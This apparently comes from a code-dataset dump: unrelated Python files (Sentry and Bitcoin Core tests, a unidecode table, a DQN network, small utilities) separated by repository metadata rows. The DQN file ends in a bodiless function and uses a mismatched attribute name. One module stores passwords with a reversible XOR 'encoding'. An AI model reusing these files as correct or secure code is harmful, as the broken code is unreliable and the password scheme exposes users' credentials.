descriptions = get_annotation_tags(TEST_TEMPLATE)
assert descriptions[0] == "Popis stránek."
assert descriptions[0].source == "Meta"
assert descriptions[1] == "Description of the web."
assert descriptions[1].source == "DC"
| 25.222222 | 79 | 0.511013 |
6c42d18b8d1ff317bfad416cf999065b8fa5f18c | 4,614 | py | Python | tests/sentry/tsdb/test_snuba.py | kinghuang/sentry | 5c22673994a62f54a782d1c595852986ccc51ae9 | [
"BSD-3-Clause"
] | 1 | 2019-10-17T17:46:16.000Z | 2019-10-17T17:46:16.000Z | tests/sentry/tsdb/test_snuba.py | kinghuang/sentry | 5c22673994a62f54a782d1c595852986ccc51ae9 | [
"BSD-3-Clause"
] | null | null | null | tests/sentry/tsdb/test_snuba.py | kinghuang/sentry | 5c22673994a62f54a782d1c595852986ccc51ae9 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import absolute_import
import pytz
from datetime import datetime, timedelta
from sentry.testutils.cases import OutcomesSnubaTest
from sentry.tsdb.base import TSDBModel
from sentry.tsdb.snuba import SnubaTSDB
from sentry.utils.dates import to_timestamp
from sentry.utils.outcomes import Outcome
def floor_to_hour_epoch(value):
value = value.replace(minute=0, second=0, microsecond=0)
return int(to_timestamp(value))
class SnubaTSDBTest(OutcomesSnubaTest):
def setUp(self):
super(SnubaTSDBTest, self).setUp()
self.db = SnubaTSDB()
# Set up the times
self.now = datetime.now(pytz.utc)
self.start_time = self.now - timedelta(days=7)
self.one_day_later = self.start_time + timedelta(days=1)
self.day_before_start_time = self.start_time - timedelta(days=1)
def test_organization_outcomes(self):
other_organization = self.create_organization()
for tsdb_model, outcome in [
(TSDBModel.organization_total_received, Outcome.ACCEPTED),
(TSDBModel.organization_total_rejected, Outcome.RATE_LIMITED),
(TSDBModel.organization_total_blacklisted, Outcome.FILTERED),
]:
# Create all the outcomes we will be querying
self.store_outcomes(
self.organization.id, self.project.id, outcome.value, self.start_time, 3
)
self.store_outcomes(
self.organization.id, self.project.id, outcome.value, self.one_day_later, 4
)
# Also create some outcomes we shouldn't be querying
self.store_outcomes(
other_organization.id, self.project.id, outcome.value, self.one_day_later, 5
)
self.store_outcomes(
self.organization.id, self.project.id, outcome.value, self.day_before_start_time, 6
)
# Query SnubaTSDB
response = self.db.get_range(
tsdb_model, [self.organization.id], self.start_time, self.now, 3600, None
)
# Assert that the response has values set for the times we expect, and nothing more
assert self.organization.id in response.keys()
response_dict = {k: v for (k, v) in response[self.organization.id]}
assert response_dict[floor_to_hour_epoch(self.start_time)] == 3
assert response_dict[floor_to_hour_epoch(self.one_day_later)] == 4
for time, count in response[self.organization.id]:
if time not in [
floor_to_hour_epoch(self.start_time),
floor_to_hour_epoch(self.one_day_later),
]:
assert count == 0
def test_project_outcomes(self):
other_project = self.create_project(organization=self.organization)
for tsdb_model, outcome in [
(TSDBModel.project_total_received, Outcome.ACCEPTED),
(TSDBModel.project_total_rejected, Outcome.RATE_LIMITED),
(TSDBModel.project_total_blacklisted, Outcome.FILTERED),
]:
# Create all the outcomes we will be querying
self.store_outcomes(
self.organization.id, self.project.id, outcome.value, self.start_time, 3
)
self.store_outcomes(
self.organization.id, self.project.id, outcome.value, self.one_day_later, 4
)
# Also create some outcomes we shouldn't be querying
self.store_outcomes(
self.organization.id, other_project.id, outcome.value, self.one_day_later, 5
)
self.store_outcomes(
self.organization.id, self.project.id, outcome.value, self.day_before_start_time, 6
)
# Query SnubaTSDB
response = self.db.get_range(
tsdb_model, [self.project.id], self.start_time, self.now, 3600, None
)
# Assert that the response has values set for the times we expect, and nothing more
assert self.project.id in response.keys()
response_dict = {k: v for (k, v) in response[self.project.id]}
assert response_dict[floor_to_hour_epoch(self.start_time)] == 3
assert response_dict[floor_to_hour_epoch(self.one_day_later)] == 4
for time, count in response[self.project.id]:
if time not in [
floor_to_hour_epoch(self.start_time),
floor_to_hour_epoch(self.one_day_later),
]:
assert count == 0
| 40.473684 | 99 | 0.626355 |
bcb2df6db38cabb539b12a7a8150ce742b50fe59 | 4,602 | py | Python | Lib/site-packages/unidecode/x05c.py | hirorin-demon/hirorin-streamlit | 03fbb6f03ec94f909d451e708a3b30b177607695 | [
"0BSD"
] | 82 | 2020-03-28T02:24:38.000Z | 2022-03-30T04:18:42.000Z | Lib/site-packages/unidecode/x05c.py | hirorin-demon/hirorin-streamlit | 03fbb6f03ec94f909d451e708a3b30b177607695 | [
"0BSD"
] | 118 | 2020-03-14T17:34:11.000Z | 2022-03-30T07:07:45.000Z | Lib/site-packages/unidecode/x05c.py | hirorin-demon/hirorin-streamlit | 03fbb6f03ec94f909d451e708a3b30b177607695 | [
"0BSD"
] | 30 | 2020-06-20T15:31:53.000Z | 2022-03-06T06:23:55.000Z | data = (
'Po ', # 0x00
'Feng ', # 0x01
'Zhuan ', # 0x02
'Fu ', # 0x03
'She ', # 0x04
'Ke ', # 0x05
'Jiang ', # 0x06
'Jiang ', # 0x07
'Zhuan ', # 0x08
'Wei ', # 0x09
'Zun ', # 0x0a
'Xun ', # 0x0b
'Shu ', # 0x0c
'Dui ', # 0x0d
'Dao ', # 0x0e
'Xiao ', # 0x0f
'Ji ', # 0x10
'Shao ', # 0x11
'Er ', # 0x12
'Er ', # 0x13
'Er ', # 0x14
'Ga ', # 0x15
'Jian ', # 0x16
'Shu ', # 0x17
'Chen ', # 0x18
'Shang ', # 0x19
'Shang ', # 0x1a
'Mo ', # 0x1b
'Ga ', # 0x1c
'Chang ', # 0x1d
'Liao ', # 0x1e
'Xian ', # 0x1f
'Xian ', # 0x20
None, # 0x21
'Wang ', # 0x22
'Wang ', # 0x23
'You ', # 0x24
'Liao ', # 0x25
'Liao ', # 0x26
'Yao ', # 0x27
'Mang ', # 0x28
'Wang ', # 0x29
'Wang ', # 0x2a
'Wang ', # 0x2b
'Ga ', # 0x2c
'Yao ', # 0x2d
'Duo ', # 0x2e
'Kui ', # 0x2f
'Zhong ', # 0x30
'Jiu ', # 0x31
'Gan ', # 0x32
'Gu ', # 0x33
'Gan ', # 0x34
'Tui ', # 0x35
'Gan ', # 0x36
'Gan ', # 0x37
'Shi ', # 0x38
'Yin ', # 0x39
'Chi ', # 0x3a
'Kao ', # 0x3b
'Ni ', # 0x3c
'Jin ', # 0x3d
'Wei ', # 0x3e
'Niao ', # 0x3f
'Ju ', # 0x40
'Pi ', # 0x41
'Ceng ', # 0x42
'Xi ', # 0x43
'Bi ', # 0x44
'Ju ', # 0x45
'Jie ', # 0x46
'Tian ', # 0x47
'Qu ', # 0x48
'Ti ', # 0x49
'Jie ', # 0x4a
'Wu ', # 0x4b
'Diao ', # 0x4c
'Shi ', # 0x4d
'Shi ', # 0x4e
'Ping ', # 0x4f
'Ji ', # 0x50
'Xie ', # 0x51
'Chen ', # 0x52
'Xi ', # 0x53
'Ni ', # 0x54
'Zhan ', # 0x55
'Xi ', # 0x56
None, # 0x57
'Man ', # 0x58
'E ', # 0x59
'Lou ', # 0x5a
'Ping ', # 0x5b
'Ti ', # 0x5c
'Fei ', # 0x5d
'Shu ', # 0x5e
'Xie ', # 0x5f
'Tu ', # 0x60
'Lu ', # 0x61
'Lu ', # 0x62
'Xi ', # 0x63
'Ceng ', # 0x64
'Lu ', # 0x65
'Ju ', # 0x66
'Xie ', # 0x67
'Ju ', # 0x68
'Jue ', # 0x69
'Liao ', # 0x6a
'Jue ', # 0x6b
'Shu ', # 0x6c
'Xi ', # 0x6d
'Che ', # 0x6e
'Tun ', # 0x6f
'Ni ', # 0x70
'Shan ', # 0x71
None, # 0x72
'Xian ', # 0x73
'Li ', # 0x74
'Xue ', # 0x75
'Nata ', # 0x76
None, # 0x77
'Long ', # 0x78
'Yi ', # 0x79
'Qi ', # 0x7a
'Ren ', # 0x7b
'Wu ', # 0x7c
'Han ', # 0x7d
'Shen ', # 0x7e
'Yu ', # 0x7f
'Chu ', # 0x80
'Sui ', # 0x81
'Qi ', # 0x82
None, # 0x83
'Yue ', # 0x84
'Ban ', # 0x85
'Yao ', # 0x86
'Ang ', # 0x87
'Ya ', # 0x88
'Wu ', # 0x89
'Jie ', # 0x8a
'E ', # 0x8b
'Ji ', # 0x8c
'Qian ', # 0x8d
'Fen ', # 0x8e
'Yuan ', # 0x8f
'Qi ', # 0x90
'Cen ', # 0x91
'Qian ', # 0x92
'Qi ', # 0x93
'Cha ', # 0x94
'Jie ', # 0x95
'Qu ', # 0x96
'Gang ', # 0x97
'Xian ', # 0x98
'Ao ', # 0x99
'Lan ', # 0x9a
'Dao ', # 0x9b
'Ba ', # 0x9c
'Zuo ', # 0x9d
'Zuo ', # 0x9e
'Yang ', # 0x9f
'Ju ', # 0xa0
'Gang ', # 0xa1
'Ke ', # 0xa2
'Gou ', # 0xa3
'Xue ', # 0xa4
'Bei ', # 0xa5
'Li ', # 0xa6
'Tiao ', # 0xa7
'Ju ', # 0xa8
'Yan ', # 0xa9
'Fu ', # 0xaa
'Xiu ', # 0xab
'Jia ', # 0xac
'Ling ', # 0xad
'Tuo ', # 0xae
'Pei ', # 0xaf
'You ', # 0xb0
'Dai ', # 0xb1
'Kuang ', # 0xb2
'Yue ', # 0xb3
'Qu ', # 0xb4
'Hu ', # 0xb5
'Po ', # 0xb6
'Min ', # 0xb7
'An ', # 0xb8
'Tiao ', # 0xb9
'Ling ', # 0xba
'Chi ', # 0xbb
'Yuri ', # 0xbc
'Dong ', # 0xbd
'Cem ', # 0xbe
'Kui ', # 0xbf
'Xiu ', # 0xc0
'Mao ', # 0xc1
'Tong ', # 0xc2
'Xue ', # 0xc3
'Yi ', # 0xc4
'Kura ', # 0xc5
'He ', # 0xc6
'Ke ', # 0xc7
'Luo ', # 0xc8
'E ', # 0xc9
'Fu ', # 0xca
'Xun ', # 0xcb
'Die ', # 0xcc
'Lu ', # 0xcd
'An ', # 0xce
'Er ', # 0xcf
'Gai ', # 0xd0
'Quan ', # 0xd1
'Tong ', # 0xd2
'Yi ', # 0xd3
'Mu ', # 0xd4
'Shi ', # 0xd5
'An ', # 0xd6
'Wei ', # 0xd7
'Hu ', # 0xd8
'Zhi ', # 0xd9
'Mi ', # 0xda
'Li ', # 0xdb
'Ji ', # 0xdc
'Tong ', # 0xdd
'Wei ', # 0xde
'You ', # 0xdf
'Sang ', # 0xe0
'Xia ', # 0xe1
'Li ', # 0xe2
'Yao ', # 0xe3
'Jiao ', # 0xe4
'Zheng ', # 0xe5
'Luan ', # 0xe6
'Jiao ', # 0xe7
'E ', # 0xe8
'E ', # 0xe9
'Yu ', # 0xea
'Ye ', # 0xeb
'Bu ', # 0xec
'Qiao ', # 0xed
'Qun ', # 0xee
'Feng ', # 0xef
'Feng ', # 0xf0
'Nao ', # 0xf1
'Li ', # 0xf2
'You ', # 0xf3
'Xian ', # 0xf4
'Hong ', # 0xf5
'Dao ', # 0xf6
'Shen ', # 0xf7
'Cheng ', # 0xf8
'Tu ', # 0xf9
'Geng ', # 0xfa
'Jun ', # 0xfb
'Hao ', # 0xfc
'Xia ', # 0xfd
'Yin ', # 0xfe
'Yu ', # 0xff
)
| 17.76834 | 19 | 0.389831 |
892885dbd6acfe44b6e8529e25a762fe30249854 | 662 | py | Python | labrat/catcher.py | jangler/labrat | fd557cfd2d8f103072fd1366b50c42363eeb254d | [
"MIT"
] | null | null | null | labrat/catcher.py | jangler/labrat | fd557cfd2d8f103072fd1366b50c42363eeb254d | [
"MIT"
] | null | null | null | labrat/catcher.py | jangler/labrat | fd557cfd2d8f103072fd1366b50c42363eeb254d | [
"MIT"
] | null | null | null | """
This module provides a call wrapper for tkinter that displays
exceptions in a messagebox.
"""
import traceback
import tkinter
import tkinter.messagebox
class Catcher:
"""A call wrapper for tkinter that displays exceptions in a messagebox."""
def __init__(self, func, subst, widget):
self.func = func
self.subst = subst
self.widget = widget
def __call__(self, *args):
try:
if self.subst:
args = self.subst(*args)
return self.func(*args)
except Exception as e:
traceback.print_exc()
tkinter.messagebox.showerror(type(e).__name__, str(e))
| 23.642857 | 78 | 0.625378 |
fb10002562dac07ad1f28af904d77f8b8394301a | 2,439 | py | Python | kotori/userdata.py | jffifa/kyotogang-toolset | 4c8e62e475b8f0a3885c03cce483d012bc267f6c | [
"MIT"
] | null | null | null | kotori/userdata.py | jffifa/kyotogang-toolset | 4c8e62e475b8f0a3885c03cce483d012bc267f6c | [
"MIT"
] | null | null | null | kotori/userdata.py | jffifa/kyotogang-toolset | 4c8e62e475b8f0a3885c03cce483d012bc267f6c | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
# -*- coding: UTF-8 -*-
import uuid
import cPickle
import os
from gconf import GConf as gconf
class UserData(object):
"""stage1st session
"""
def __init__(self):
self.uuid = uuid.uuid3(uuid.NAMESPACE_DNS, gconf.BASE_URL)
# encode a string password to big integer
def _encode(self, password):
res = 0
b = 0
mask = self.uuid.int
for ch in password:
res |= (ord(ch) ^ (mask & 255)) << b
b += 8
mask >>= 8
if mask == 0:
mask = self.uuid.int
return res
# decode a big integer into string password
def _decode(self, enc_password):
passwd = ''
mask = self.uuid.int
while enc_password > 0:
ch = enc_password & 255
passwd += chr(ch ^ (mask & 255))
enc_password >>= 8
mask = mask >> 8
if mask == 0:
mask = self.uuid.int
return passwd
# return a list of tuples (username, password)
def load_user_data(self, filepath=None):
if filepath is None:
filepath = gconf.USER_DATA_PATH
if not os.path.exists(os.path.dirname(filepath)):
os.makedirs(os.path.dirname(filepath))
if not os.path.exists(filepath):
f = open(filepath, 'wb')
cPickle.dump([], f, 2)
f.close()
f = open(filepath, 'rb')
try:
encUserData = cPickle.load(f)
except:
raise Exception('Cannot pickle user data correctly. Please remove the user data file and retry.')
return map(lambda (x,y): (x,self._decode(y)), encUserData)
# user data should be a list of tuples (username, password)
def save_user_data(self, userData, filepath=None):
if filepath is None:
filepath = gconf.USER_DATA_PATH
if not os.path.exists(os.path.dirname(filepath)):
os.makedirs(os.path.dirname(filepath))
encUserData = map(lambda (x,y): (x,self._encode(y)), userData)
f = open(filepath, 'wb')
cPickle.dump(encUserData, f, 2)
f.close()
# test case
if __name__ == '__main__':
ud = UserData()
passwd='kotori@9my_little_angel狂三小天使@kula-fans'
x = ud._encode(passwd)
print x
y = ud._decode(x)
print y
print y == passwd
#ud.save_user_data([('test', passwd)])
print ud.load_user_data()
| 30.111111 | 109 | 0.566626 |
e6bfbf303cca63c8f7174f60d7095967c78bff0d | 5,018 | py | Python | src/ddqn.py | shuyangw/cs682-final-project | ccc751fbf36380d37d90a6e51d6e7c27608b8506 | [
"MIT"
] | null | null | null | src/ddqn.py | shuyangw/cs682-final-project | ccc751fbf36380d37d90a6e51d6e7c27608b8506 | [
"MIT"
] | null | null | null | src/ddqn.py | shuyangw/cs682-final-project | ccc751fbf36380d37d90a6e51d6e7c27608b8506 | [
"MIT"
] | null | null | null | import tensorflow as tf
import numpy as np
class DDQNCNN(object):
def __init__(self, state_size, action_size, lr, name="DDQN"):
self.state_size = state_size
self.action_size = action_size
self.lr = lr
self.name = name
with tf.variable_scope(self.name):
# We create the placeholders
# *state_size means that we take each elements of state_size in tuple hence is like if we wrote
# [None, 100, 120, 4]
self.inputs_ = tf.placeholder(tf.float32, [None, *state_size], name="inputs")
#
self.ISWeights_ = tf.placeholder(tf.float32, [None,1], name='IS_weights')
self.actions_ = tf.placeholder(tf.float32, [None, action_size], name="actions_")
# Remember that target_Q is the R(s,a) + ymax Qhat(s', a')
self.target_Q = tf.placeholder(tf.float32, [None], name="target")
"""
First convnet:
CNN
ELU
"""
# Input is 100x120x4
self.conv1 = tf.layers.conv2d(inputs = self.inputs_,
filters = 32,
kernel_size = [8,8],
strides = [4,4],
padding = "VALID",
kernel_initializer=tf.contrib.layers.xavier_initializer_conv2d(),
name = "conv1")
self.conv1_out = tf.nn.elu(self.conv1, name="conv1_out")
"""
Second convnet:
CNN
ELU
"""
self.conv2 = tf.layers.conv2d(inputs = self.conv1_out,
filters = 64,
kernel_size = [4,4],
strides = [2,2],
padding = "VALID",
kernel_initializer=tf.contrib.layers.xavier_initializer_conv2d(),
name = "conv2")
self.conv2_out = tf.nn.elu(self.conv2, name="conv2_out")
"""
Third convnet:
CNN
ELU
"""
self.conv3 = tf.layers.conv2d(inputs = self.conv2_out,
filters = 128,
kernel_size = [4,4],
strides = [2,2],
padding = "VALID",
kernel_initializer=tf.contrib.layers.xavier_initializer_conv2d(),
name = "conv3")
self.conv3_out = tf.nn.elu(self.conv3, name="conv3_out")
self.flatten = tf.layers.flatten(self.conv3_out)
self.value_fc = tf.layers.dense(inputs = self.flatten,
units = 512,
activation = tf.nn.elu,
kernel_initializer=tf.contrib.layers.xavier_initializer(),
name="value_fc")
self.value = tf.layers.dense(inputs = self.value_fc,
units = 1,
activation = None,
kernel_initializer=tf.contrib.layers.xavier_initializer(),
name="value")
# Ccalculate A(s,a)
self.advantage_fc = tf.layers.dense(inputs = self.flatten,
units = 512,
activation = tf.nn.elu,
kernel_initializer=tf.contrib.layers.xavier_initializer(),
name="advantage_fc")
self.advantage = tf.layers.dense(inputs = self.advantage_fc,
units = self.action_size,
activation = None,
kernel_initializer=tf.contrib.layers.xavier_initializer(),
name="advantages")
# Agregating layer
# Q(s,a) = V(s) + (A(s,a) - 1/|A| * sum A(s,a'))
self.output = self.value + tf.subtract(self.advantage,
tf.reduce_mean(self.advantage, axis=1, keepdims=True))
# Q is our predicted Q value.
self.Q = tf.reduce_sum(tf.multiply(self.output, self.actions_), axis=1)
# The loss is modified because of PER
self.absolute_errors = tf.abs(self.target_Q - self.Q)
self.loss = tf.reduce_mean(
self.ISWeights_ * tf.squared_difference(self.target_Q, self.Q))
self.optimizer = tf.train.RMSPropOptimizer(
self.learning_rate).minimize(self.loss)
def predict_action(explore_start, explore_stop, decay_rate, decay_step, state, actions):
| 41.131148 | 107 | 0.454564 |
67e88eb40dccaf389bcedef1bc66c18c6e32cc5d | 3,035 | py | Python | toshl/SimpleConsoleUI.py | pabadrubio/toshl_sync | 40d7d3356b0e1be392091e1285de9cbb9a0c68a6 | [
"Apache-2.0"
] | null | null | null | toshl/SimpleConsoleUI.py | pabadrubio/toshl_sync | 40d7d3356b0e1be392091e1285de9cbb9a0c68a6 | [
"Apache-2.0"
] | null | null | null | toshl/SimpleConsoleUI.py | pabadrubio/toshl_sync | 40d7d3356b0e1be392091e1285de9cbb9a0c68a6 | [
"Apache-2.0"
] | null | null | null | # Pablo Abad 2017
#
# Toshl database program
class SimpleConsoleUI():
def __init__(self, io, database):
self.io = io
self.database = database
def classifyManually(self, bankEntry):
# Show the entry:
self.io.stdout('-----------------------------------------------')
self.io.stdout('Account: ' + bankEntry.account)
self.io.stdout('Purpose: ' + bankEntry.purpose)
self.io.stdout('Message: ' + bankEntry.message)
self.io.stdout('Date : ' + str(bankEntry.date))
self.io.stdout('Amount : ' + str(bankEntry.amount))
self.io.stdout('-----------------------------------------------')
self.io.stdout('Choose a category:')
category = self._choose_category_from_list(self.database.getCategories())
if category is not None and category != '':
self.io.stdout('Choose a tag:')
tag = self._choose_tag_from_list(self.database.getTags(), category)
else:
tag = ''
if category is None or tag is None:
return None, None
return category, tag
def askForOverwrite(self, toshlEntry):
self.io.stdout('-----------------------------------------------')
self.io.stdout('A similar entry was found:')
toshlEntry.prettyPrint()
self.io.stdout('-----------------------------------------------')
selection = self.io.getString("Overwrite? (Enter yes to overwrite)")
return selection == "yes"
def _choose_from_list(self, elements, label, create_function):
index = 0
elementsPerRow = 4
while index < len(elements):
lastInRow = min(len(elements), index + elementsPerRow)
while index < lastInRow:
e = elements[index]
self.io.stdoutnnl('%2d. %-30s' % (index+1, ((e[:26] + '..') if len(e) > 28 else e)))
index += 1
self.io.stdout('')
selection = self.io.getString("Please choose (E for skip, N for None, G to add a new expense type, I for a new Income type)")
if selection.upper() == "N":
return ''
elif selection.upper() == "G":
name = self.io.getString("Enter the name for the new expense " + label + ":")
create_function(name, "expense")
return name
elif selection.upper() == "I":
name = self.io.getString("Enter the name for the new income " + label + ":")
create_function(name, "income")
return name
elif selection.upper() == "E":
return None
else:
selectionIdx = int(selection)
return elements[selectionIdx-1]
def _choose_category_from_list(self, elements):
return self._choose_from_list(elements, "category", lambda name, t: self.database.addCategory(name, t))
def _choose_tag_from_list(self, elements, category):
return self._choose_from_list(elements, "tag", lambda name, t: self.database.addTag(name, t, category))
| 41.013514 | 133 | 0.551895 |
f6e27834ba523d69a63dd13dd3dc4268cbe88b54 | 267 | py | Python | manage.py | valarpirai/HobbyProject | 072e75bdb9008788059f330f8fbaed6946a5ffad | [
"MIT"
] | 2 | 2017-06-04T10:25:59.000Z | 2020-08-07T09:05:10.000Z | manage.py | valarpirai/HobbyProject | 072e75bdb9008788059f330f8fbaed6946a5ffad | [
"MIT"
] | 2 | 2021-03-25T21:39:04.000Z | 2021-06-01T21:44:33.000Z | manage.py | valarpirai/HobbyProject | 072e75bdb9008788059f330f8fbaed6946a5ffad | [
"MIT"
] | null | null | null | from flask_script import Manager
from myapp import app
# print(dir(app))
manager = Manager(app.flask_app)
@manager.command
def hello():
print( "hello world")
manager.add_command('runserver', app.flask_app.run())
if __name__ == "__main__":
manager.run()
| 15.705882 | 53 | 0.715356 |
b7814bf33e5d4f7039478802591f6ae4e01ef09a | 7,628 | py | Python | test/functional/feature_assumevalid.py | joaquimsilva12/Q8bitcoin | 10b5901120a0ef369e403f761323680f1b61f1bc | [
"MIT"
] | 4 | 2019-07-29T15:20:16.000Z | 2020-04-10T16:42:18.000Z | test/functional/feature_assumevalid.py | ExodusMovement/bitcoin-magnifier | ce6762030f814bc737bb0a097c17201e0b2edbc5 | [
"MIT"
] | 13 | 2018-07-16T18:14:02.000Z | 2020-01-17T19:36:58.000Z | test/functional/feature_assumevalid.py | ExodusMovement/bitcoin-magnifier | ce6762030f814bc737bb0a097c17201e0b2edbc5 | [
"MIT"
] | 10 | 2019-05-23T03:15:07.000Z | 2021-12-04T13:32:05.000Z | #!/usr/bin/env python3
# Copyright (c) 2014-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test logic for skipping signature validation on old blocks.
Test logic for skipping signature validation on blocks which we've assumed
valid (https://github.com/bitcoin/bitcoin/pull/9484)
We build a chain that includes and invalid signature for one of the
transactions:
0: genesis block
1: block 1 with coinbase transaction output.
2-101: bury that block with 100 blocks so the coinbase transaction
output can be spent
102: a block containing a transaction spending the coinbase
transaction output. The transaction has an invalid signature.
103-2202: bury the bad block with just over two weeks' worth of blocks
(2100 blocks)
Start three nodes:
- node0 has no -assumevalid parameter. Try to sync to block 2202. It will
reject block 102 and only sync as far as block 101
- node1 has -assumevalid set to the hash of block 102. Try to sync to
block 2202. node1 will sync all the way to block 2202.
- node2 has -assumevalid set to the hash of block 102. Try to sync to
block 200. node2 will reject block 102 since it's assumed valid, but it
isn't buried by at least two weeks' work.
"""
import time
from test_framework.blocktools import (create_block, create_coinbase)
from test_framework.key import ECKey
from test_framework.messages import (
CBlockHeader,
COutPoint,
CTransaction,
CTxIn,
CTxOut,
msg_block,
msg_headers
)
from test_framework.mininode import P2PInterface
from test_framework.script import (CScript, OP_TRUE)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal
class BaseNode(P2PInterface):
def send_header_for_blocks(self, new_blocks):
headers_message = msg_headers()
headers_message.headers = [CBlockHeader(b) for b in new_blocks]
self.send_message(headers_message)
class AssumeValidTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
def setup_network(self):
self.add_nodes(3)
# Start node0. We don't start the other nodes yet since
# we need to pre-mine a block with an invalid transaction
# signature so we can pass in the block hash as assumevalid.
self.start_node(0)
def send_blocks_until_disconnected(self, p2p_conn):
"""Keep sending blocks to the node until we're disconnected."""
for i in range(len(self.blocks)):
if not p2p_conn.is_connected:
break
try:
p2p_conn.send_message(msg_block(self.blocks[i]))
except IOError as e:
assert not p2p_conn.is_connected
break
def assert_blockchain_height(self, node, height):
"""Wait until the blockchain is no longer advancing and verify it's reached the expected height."""
last_height = node.getblock(node.getbestblockhash())['height']
timeout = 10
while True:
time.sleep(0.25)
current_height = node.getblock(node.getbestblockhash())['height']
if current_height != last_height:
last_height = current_height
if timeout < 0:
assert False, "blockchain too short after timeout: %d" % current_height
timeout - 0.25
continue
elif current_height > height:
assert False, "blockchain too long: %d" % current_height
elif current_height == height:
break
def run_test(self):
p2p0 = self.nodes[0].add_p2p_connection(BaseNode())
# Build the blockchain
self.tip = int(self.nodes[0].getbestblockhash(), 16)
self.block_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time'] + 1
self.blocks = []
# Get a pubkey for the coinbase TXO
coinbase_key = ECKey()
coinbase_key.generate()
coinbase_pubkey = coinbase_key.get_pubkey().get_bytes()
# Create the first block with a coinbase output to our key
height = 1
block = create_block(self.tip, create_coinbase(height, coinbase_pubkey), self.block_time)
self.blocks.append(block)
self.block_time += 1
block.solve()
# Save the coinbase for later
self.block1 = block
self.tip = block.sha256
height += 1
# Bury the block 100 deep so the coinbase output is spendable
for i in range(100):
block = create_block(self.tip, create_coinbase(height), self.block_time)
block.solve()
self.blocks.append(block)
self.tip = block.sha256
self.block_time += 1
height += 1
# Create a transaction spending the coinbase output with an invalid (null) signature
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.block1.vtx[0].sha256, 0), scriptSig=b""))
tx.vout.append(CTxOut(49 * 100000000, CScript([OP_TRUE])))
tx.calc_sha256()
block102 = create_block(self.tip, create_coinbase(height), self.block_time)
self.block_time += 1
block102.vtx.extend([tx])
block102.hashMerkleRoot = block102.calc_merkle_root()
block102.rehash()
block102.solve()
self.blocks.append(block102)
self.tip = block102.sha256
self.block_time += 1
height += 1
# Bury the assumed valid block 2100 deep
for i in range(2100):
block = create_block(self.tip, create_coinbase(height), self.block_time)
block.nVersion = 4
block.solve()
self.blocks.append(block)
self.tip = block.sha256
self.block_time += 1
height += 1
self.nodes[0].disconnect_p2ps()
# Start node1 and node2 with assumevalid so they accept a block with a bad signature.
self.start_node(1, extra_args=["-assumevalid=" + hex(block102.sha256)])
self.start_node(2, extra_args=["-assumevalid=" + hex(block102.sha256)])
p2p0 = self.nodes[0].add_p2p_connection(BaseNode())
p2p1 = self.nodes[1].add_p2p_connection(BaseNode())
p2p2 = self.nodes[2].add_p2p_connection(BaseNode())
# send header lists to all three nodes
p2p0.send_header_for_blocks(self.blocks[0:2000])
p2p0.send_header_for_blocks(self.blocks[2000:])
p2p1.send_header_for_blocks(self.blocks[0:2000])
p2p1.send_header_for_blocks(self.blocks[2000:])
p2p2.send_header_for_blocks(self.blocks[0:200])
# Send blocks to node0. Block 102 will be rejected.
self.send_blocks_until_disconnected(p2p0)
self.assert_blockchain_height(self.nodes[0], 101)
# Send all blocks to node1. All blocks will be accepted.
for i in range(2202):
p2p1.send_message(msg_block(self.blocks[i]))
# Syncing 2200 blocks can take a while on slow systems. Give it plenty of time to sync.
p2p1.sync_with_ping(200)
assert_equal(self.nodes[1].getblock(self.nodes[1].getbestblockhash())['height'], 2202)
# Send blocks to node2. Block 102 will be rejected.
self.send_blocks_until_disconnected(p2p2)
self.assert_blockchain_height(self.nodes[2], 101)
if __name__ == '__main__':
AssumeValidTest().main()
| 39.729167 | 107 | 0.654955 |
9a6321cae097fcfd27c9fd5fcd87d22d024f1720 | 1,536 | py | Python | discord_notification_emailer/clusterer.py | csebra52/discord-notification-emailer | 5e58ec73b6230f9ec81dcbb75471a85c9cd5018a | [
"MIT"
] | 6 | 2019-05-04T01:31:37.000Z | 2021-07-28T15:44:41.000Z | discord_notification_emailer/clusterer.py | dylngg/discord_notification_emailer | 5e58ec73b6230f9ec81dcbb75471a85c9cd5018a | [
"MIT"
] | null | null | null | discord_notification_emailer/clusterer.py | dylngg/discord_notification_emailer | 5e58ec73b6230f9ec81dcbb75471a85c9cd5018a | [
"MIT"
] | 4 | 2021-02-20T20:58:45.000Z | 2021-10-30T12:56:35.000Z | import threading
import time
class ClusterManager():
def __init__(self, callback, clustering_period=10):
"""Defines a cluster manager that allows for the clustering of objects
in a period of time. After that period of time, a callback is called
and the cluster is reset.
:param callback: A function to call when the clustering period is
over. The objects in the cluster are passed into that callback as the
sole argument.
:param clustering_period: The period of time in seconds in which all
objects added are clustered together.
"""
self.callback = callback
self.clustering_period = clustering_period
self._clustering = False
self._cluster = []
def append(self, obj):
"""Appends a obj and clusters it accordingly.
:param obj: An object that is added to the cluster
"""
if not self._clustering:
self._start_clustering()
self._cluster.append(obj)
def _start_clustering(self):
"""Starts a clustering timer that does a callback with all the obj in
the cluster after a period of time.
"""
self._clustering = True
thread = threading.Thread(target=self.end_cluster)
thread.start()
def end_cluster(self):
"""Waits a specified period of time and calls the callback"""
time.sleep(self.clustering_period)
self.callback(self._cluster)
self._cluster = []
self._clustering = False
| 32.680851 | 78 | 0.647786 |
bb2935a317554ff71265555008b275a301e6f81b | 2,118 | py | Python | osm_mon/dashboarder/dashboarder.py | TCSOSM-20/MON | 06ad698093d4e39b199ba466617bf8cef6df5c42 | [
"Apache-2.0"
] | null | null | null | osm_mon/dashboarder/dashboarder.py | TCSOSM-20/MON | 06ad698093d4e39b199ba466617bf8cef6df5c42 | [
"Apache-2.0"
] | null | null | null | osm_mon/dashboarder/dashboarder.py | TCSOSM-20/MON | 06ad698093d4e39b199ba466617bf8cef6df5c42 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2018 Whitestack, LLC
# *************************************************************
# This file is part of OSM Monitoring module
# All Rights Reserved to Whitestack, LLC
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
